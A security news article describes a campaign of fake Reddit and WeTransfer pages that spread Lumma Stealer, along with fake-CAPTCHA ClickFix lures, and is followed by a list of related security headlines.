Hundreds of websites impersonating Reddit and WeTransfer spread Lumma Stealer

📟 News

Date: 24/01/2025

Sekoia researcher crep1x discovered that hackers are currently using some 1,000 pages impersonating Reddit and WeTransfer. Victims visiting these sites are tricked into downloading the Lumma Stealer malware.

All fake Reddit pages use the same social engineering trick: they show a discussion thread on a specific issue. In most cases, the alleged thread creator asks for help with downloading a certain tool; while some ‘Good Samaritan’ offers help by supposedly uploading the required software to WeTransfer and posting a link to it. To make the scam look more credible, a third user thanks the ‘Good Samaritan’.

Unsuspecting users who click on such a link are taken to a fake WeTransfer site that mimics the popular file-sharing service. The “Download” button there downloads the Lumma Stealer payload from weighcobbweo[.]top.

Fake Reddit
Fake Reddit

Addresses of rogue sites used in this campaign contain the name of the brand they pretend to be (e.g. Reddit) followed by random numbers and symbols. Most of such fake sites use top-level domains (.org and .net).

The Sekoia analyst published a list of web pages used in this scam. In total, it includes 529 pages disguised as Reddit and 407 pages impersonating WeTransfer.

The number of victims lured to such fake resources remains unknown but Bleeping Computer notes that attacks can begin with malicious advertisements, SEO poisoning, malicious sites, messages sent via social networks and instant messengers, etc.

According to Netskope Threat Labs, malefactors actively spread Lumma Stealer using fake CAPTCHAs. Such attacks exploit the ClickFix (ClearFake or OneDrive Pastejacking) attack vector, which is quite popular among cybercriminals nowadays.

Victims are tricked into visiting rogue websites and running malicious PowerShell commands, thus, manually infecting their systems with malware. In most cases, malefactors require users to pass a fake CAPTCHA test or a verification procedure – allegedly, to solve a browser issue or join a channel.

Related posts:
2025.04.29 — FBI Offers 10 million USD for information on Salt Typhoon members

The FBI offers up to 10 million USD for information about members of the Chinese hacker group Salt Typhoon and last year's attack that had…

Full article →
2025.02.06 — Let's Encrypt to stop sending expiration notification emails

The nonprofit organization announced that, starting June 4, 2025, it will stop sending expiration notification emails to subscribers. The primary reason behind this decision…

Full article →
2025.02.09 — Abandoned AWS S3 buckets could be used in attacks targeting supply chains

watchTowr discovered plenty of abandoned Amazon S3 buckets that could be used by attackers to deliver malware and backdoors to government agencies and large corporations. The researchers discovered…

Full article →
2025.01.26 — Cisco patched a critical vulnerability in Meeting Management

Cisco released updates to fix a critical (CVSS score: 9.9) vulnerability in Meeting Management. The bug enables an unprivileged remote authenticated attacker to gain administrative privileges. The vulnerability…

Full article →
2025.04.22 — Scammers pose as FBI IC3 specialists, offer 'assistance' to fraud victims

According to the FBI, scammers impersonating employees of the FBI Internet Fraud Complaint Center (IC3) contact fraud victims offering them 'assistance' in getting their money…

Full article →
2025.01.30 — Hackers use vulnerabilities in SimpleHelp RMM to attack corporate networks

Experts believe that recently patched vulnerabilities in SimpleHelp Remote Monitoring and Management (RMM) were used by attackers to gain initial access to corporate networks. A number…

Full article →
2025.01.27 — YouTube plays hour-long ads to users with ad blockers

Users complain that YouTube plays very long unskippable ads. Sometimes such ads are longer than the video the person is watching. The issue was raised…

Full article →
2025.02.14 — 12,000 Kerio Control firewalls remain vulnerable to RCE

Security experts report that more than 12,000 GFI Kerio Control firewall instances remain vulnerable to the critical RCE vulnerability CVE-2024-52875, which was fixed…

Full article →
2025.02.08 — Hackers exploit RCE vulnerability in Microsoft Outlook

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned Federal Civilian Executive Branch (FCEB) Agencies that they have to secure their systems from ongoing…

Full article →
2025.02.03 — PyPI introduces a project archival system to combat malicious updates

The Python Package Index (PyPI) introduces a new project archival system: a project can now be archived to notify users that it's not expected to be updated…

Full article →